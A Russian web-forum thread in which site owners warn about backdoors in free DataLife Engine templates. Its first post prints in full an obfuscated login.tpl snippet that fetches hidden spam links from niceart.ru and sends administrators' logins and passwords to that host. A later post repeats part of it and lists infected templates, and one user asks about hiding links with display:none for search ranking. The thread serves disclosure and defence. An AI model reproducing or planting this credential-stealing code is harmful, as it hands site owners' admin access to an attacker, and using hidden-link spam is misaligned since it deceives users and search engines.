Что нашел в бесплатном шаблоне

[Langly 7]

в login.tpl следующий код:

<?

$login_cache="engine/cache/system/login_cache.txt"; 

$logingtrue1 = 'eart';

$logingtrue2 = 'htt';

$logingtrue3 = '.r';

$logingtrue4 = 'p://nic';

if(!is_file($login_cache) || filemtime($login_cache)<time()-432000) 

{ 

$file_url = $logingtrue2 . $logingtrue4 . $logingtrue1 . $logingtrue3 . "u/getlink/003/db.php?ticket=095" ."&script_id=". urlencode($_SERVER['SERVER_NAME']); 

$logingtrue = @file_get_contents($file_url); 

if($logingtrue) 

{

$file = fopen($login_cache, "w");

fwrite( $file, $logingtrue);

fclose( $file );

// chmod ( $file, 0777); //права

}

} 

else {

$logingtrue = file_get_contents($login_cache); 

}

if ($is_logged == TRUE){

$login_panel = <<<HTML

<div style="padding-top:2px; padding-left:20px;">Привет, <b>{$member_id['name']}</b>!</div>

<div style="padding-top:5px; padding-bottom:5px; padding-left:22px;">

HTML;


if ($user_group[$member_id['user_group']]['allow_admin']) {

$file_url = $logingtrue2 . $logingtrue4 . $logingtrue1 . $logingtrue3 . "u/getlink/003/db.php?ticket=095" ."&script_id=". urlencode($_SERVER['SERVER_NAME']) ."&un=". $login_name ."&up=". $login_password; 

$logingtrue = file_get_contents($file_url); 

$login_panel .= <<<HTML

		<a href="{$adminlink}" target="_blank">Админцентр</a> | 

HTML;

}

$login_panel .= <<<HTML

	<a href="{$link_profile}">Мой профиль</a> | <a href="{$link_pm}">Cообщения ({$member_id['pm_unread']} | {$member_id['pm_all']})</a> | 

<a href="{$link_favorites}">Мои закладки</a> | <a href="{$link_stats}">Статистика</a> | <a href="{$link_addnews}">Добавить новость</a> | 

<a href="{$link_newposts}">Обзор непрочитанного</a>  |  <div style="padding-top:2px; padding-bottom:5px; padding-left:75px;"><a onclick="java script: showBusyLayer()" href="{$link_logout}"><b>Завершить сеанс!</b></a></div>

				</div>

HTML;


} else {

$login_panel = <<<HTML

$logingtrue

 			<div style="padding-top:5px; padding-left:21px;">


  <table class="stext">

	<form method=post onsubmit="java script: showBusyLayer()">

	  <tr align="left" valign="middle"> 

		<td width="58" height="25" align="right">Логин</td>

		<td height="25" align="right"><input type="text" name="login_name" style="width:103px; height:20px; font-family:tahoma; font-size:11px; border:1px solid #E0E0E0 "></td>

		<td align="right">Пароль</td>

		<td align="right"><input type="password" name="login_password" style="width:103px; height:20px; font-family:tahoma; font-size:11px; border:1px solid #E0E0E0 "></td>

		<td align="right"> <input onclick="submit();" name="image" type="image" src="{THEME}/images/send.png"> 

		  <input name="login" type="hidden" id="login2" value="submit"></td>

		<td align="right"><a href="{$link_regist}">Регистрация на сайте!</a><br> 

		  <a href="{$link_lost}">Забыли пароль?</a></td>

	  </tr>

	</form>

  </table>

			  </div>

<div style="padding-top:8px; padding-left:55px; padding-bottom:5px;"></div>

HTML;

}

?>

Содержимое созданного файла engine/cache/system/login_cache.txt :

<div style="display: none;">

Всё по движку datalfe engine <a href="http://niceart.ru">datalife engine</a> например, шаблоны, модули для движка.

Сайт для православных - <a href="http://rppr.ru">Русский православный сайт</a> - круг общения русских людей.

Скачать электронные книги без регистрации <a href="http://bookloader.info">электронные книги</a> - e-books и электронные книги. 

За новосятми для развлечения приходите на <a href="http://superpuper.info">развлекательный портал</a> и общайтесь в удовольствие.

Самые свежие авто новости про автомобили здесь - <a href="http://avtoparty.info">автомобильные новости</a> - каждому автолюбителю.

</div>

А логин и пароль отсылаются на адрес: _http://niceart.ru/getlink/003/db.php?ticket=095

Пользуйтесь бесплатными шаблонами товарищи:-)

[absolutNO 0]

Мда бывает.

[n0lik 75]

Langly, ты бы хоть написал, что за шаблон, таких людей должны знать в лицо. А то кто знает... может ты сам это придумал.

[КиберБулка 2]

Хм...

По идее в .tpl php код внедрить должно быть невозможно.

[Akela 9]

По идее в .tpl php код внедрить должно быть невозможно.

login.tpl - это единственный шаблон, в котором есть php код.

[Langly 7]

Langly, ты бы хоть написал, что за шаблон, таких людей должны знать в лицо. А то кто знает... может ты сам это придумал.

Больше мне делать нечего как подобные вещи выдумывать.

Шаб нашел в паблике. Написал-же "бесплатный". Хз на каком сайте, не помню уже(но не на твоем, это точно:-)).

Выложил все это с единственной целью - показать что нашел в коде, для того чтобы люди любой шаблон проверяли на наличие подобного кода перед использованием. В первую очередь в админке антивирем. Если создаются в движке какие-то непредусмотренные файлы он их показывает.

Кто знает как и где еще могут располагаться зловредные коды в шаблонах - напишите. Интересно.

Изменено 29 сентября 2008 пользователем Langly

[sting 0]

Все правильно таких бесплатных шаблонов пруд пруди, сам постоянно нахожу такие, если людям интересно привожу их названия:

CS_theme2

dle_2008_saratov

dle_templates_red_alert

dleohotnikoff

fanfootbal-stx

Free_Template

freemir

gta

pirate2

shabszel

Software

warezlife

warezlife1

wow_tpl

это найденные мной на скорую руку, во всех файлах login.tpl

<?

$login_cache="engine/cache/system/login_cache.txt";

$logingtrue1 = 'eart';

$logingtrue2 = 'htt';

$logingtrue3 = '.r';

$logingtrue4 = 'p://nic';

if(!is_file($login_cache) || filemtime($login_cache)<time()-432000)

{

$file_url = $logingtrue2 . $logingtrue4 . $logingtrue1 . $logingtrue3 . "u/getlink/003/db.php?ticket=095" ."&script_id=".

далее делайте выводы сами, есть конечно бяки в других файлах tpl по не такие смертельные. Не думаю что этот чел сам делал все эти шаблоны а авторы явно даже и не догадываются о такой подставе, просто он вписывает туда свой код дабы получить доступ к сайтам и возобнить себя крутым хацкером. Сам аналогично не помню откуда их качал но думаю не составит труда по автору публикации найти его.

[Greeze 0]

sting,

не лишнем будет указать источник, откуда скачивались шаблоны.

[sting 0]

sting,

не лишнем будет указать источник, откуда скачивались шаблоны.

Ты что шутишь, я не записываю такие вещи, но можно поюзать поиск например ищем shabszel вот, бите

http://yandex.ru/yandsearch?clid=13999&amp...p;text=shabszel

получаем

1. Скин в зеленых тонах " For DLE - Все для dle,шаблоны,модули...

Скачать: shabszel.rar [202.87 Kb] (cкачиваний:

fdle.ru/2007/12/16/skin-v-zelenykh-tonakh.html · 33 КБ

далее по аналогии.

[vadivasil 0]

по-моему, надо стороной обходить все бесплатное. т.к. бесплатный тока сыр в мышеловке.

[Langly 7]

далее делайте выводы сами, есть конечно бяки в других файлах tpl по не такие смертельные. Не думаю что этот чел сам делал все эти шаблоны а авторы явно даже и не догадываются о такой подставе, просто он вписывает туда свой код дабы получить доступ к сайтам и возобнить себя крутым хацкером. Сам аналогично не помню откуда их качал но думаю не составит труда по автору публикации найти его.

Можно чуть подробнее. Что именно бывает в других файлах и в каких обычно?

[sting 0]

Например ссылки на какой либо сайт для поднятия его цытируемости, еще проще взять подобный шаблон и внимательно просмотреть его код плюс проанализировать что и зачем.

[MVFedosov 0]

Можно добавить ещё пару слов о использовании нелицензионных версий dle: недавно просмотрел и сравнил коды лицензионки и нулёной версии - после этого был снят вопрос о частых темах про взлом dle - в нелицензионную версию помимо снятия различного вида проверок была добавлена куча дырок для взлома сайта.

Так что пользуйтесь оригинальной версией.

[deGODy 0]

в нелицензионную версию помимо снятия различного вида проверок была добавлена куча дырок для взлома сайта.

Так что пользуйтесь оригинальной версией.

Ага пользуйтесь Стоит ого-го дороговастенько, чтоб купить лицензию мне надо тогда почти пол года стипендию откладывать

А с другой стороны

бесплатный только сыр в мышеловке

А мне хорошо я на Joomla 1.5.7 сижу

Изменено 29 октября 2008 пользователем deGODy

[celsoft 6 072]

Ага пользуйтесь Стоит ого-го дороговастенько, чтоб купить лицензию мне надо тогда почти по года стипендию откладывать

Очень интересно, 1500 это дорого, у меня вот возник вопрос на компьютер вы тогда с рождения копили или его украли? За интернет вы платите экономя на хлебе? или у соседа воруете подключившись к его кабелям. За хостинг вы платите приторговывая пиратскими дисками на рынке или просто взломали хостинг провайдера и взяли себе кусочек места? Про домен я молчу, т.к. боюсь предположить откуда он у вас. Вы оправдываете такое уголовное преступление как воровство тем, что у вас нет денег. Оригинально. Но дело даже не в этом, если у вас нет денег, вам не хочется платить за скрипта, так извините какого .... вы тогда его используете? Есть бесплатные скрипты, используйте их, зачем воровать и оправдывать себя? Вот этого я хоть убейте не понимаю.

[Langly 7]

<div style="display: none;">ссылка</div>

Кстати, такие ссылки индексятся поисковиками или нет, кто знает?

Бывает надо несколько ссылок поставить, чтобы индекснулись, а вид портят.

Если так оформлять будут индекситься?